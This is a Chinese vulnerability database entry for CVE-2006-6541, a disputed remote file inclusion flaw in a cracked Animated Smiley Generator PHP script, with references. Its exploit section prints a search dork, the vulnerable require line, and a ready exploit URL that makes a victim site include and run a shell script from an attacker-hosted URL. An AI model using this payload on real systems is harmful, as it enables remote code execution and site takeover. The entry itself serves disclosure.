Animated Smiley Generator破解版'final.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192490 漏洞类型 未知
发布时间 2006-12-13 更新时间 2007-01-02
CVE编号 CVE-2006-6541 CNNVD-ID CNNVD-200612-307
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-307
|漏洞详情
**有争议**AnimatedSmileyGenerator破解版的signer/final.php中存在PHP远程文件包含漏洞,远程攻击者可通过smiley参数中的URL执行任意PHP代码。注:厂商对此有争议。称只有AnimatedSmileyGenerator的破解版有影响,开发者提供的版本不受影响:"合法购买的应用系统不会允许有这样的利用漏洞。"
|漏洞EXP
# LiderHack.Org & Trtekforum.com

# script name : Animated Smiley Generator

# Version : All

# script sites : http://smileygenerator.us

#Dork :  "Smileygenerator"

# Risk : High

# Found By : St@rExT

# Vulnerable file :final.php

#Error code :  require("$smiley/cmd.php");

#Exploit:

http://victim.com/[scriptpath]/signer/final.php?smiley=http://yourshellu
rl?

# Thanks : Dekolax , ShaFuck31 , ST@ReXT , Dekolax , Swat_Hack , Maverick , Candark , Torlaq , Woheras , Siruas,TurkAkrep

# E-mail: Starext[at]msn[dot]com

##################### --Trkm -- ####################
|参考资料

来源:XF
名称:animated-final-file-include(30794)
链接:http://xforce.iss.net/xforce/xfdb/30794
来源:MISC
链接:http://www.smileygenerator.us/sales/index.php?act=viewProd&productId=8
来源:MISC
链接:http://www.smileygenerator.us/sales/index.php
来源:BUGTRAQ
名称:20061208AnimatedSmileyGeneratorFileIncludeVul.
链接:http://www.securityfocus.com/archive/1/archive/1/453934/100/0/threaded
来源:VIM
名称:20061226VendordisputeforAnimatedSmileyGeneratorRFI(CVE-2006-6541)
链接:http://www.attrition.org/pipermail/vim/2006-December/001195.html
来源:SREASON
名称:2031
链接:http://securityreason.com/securityalert/2031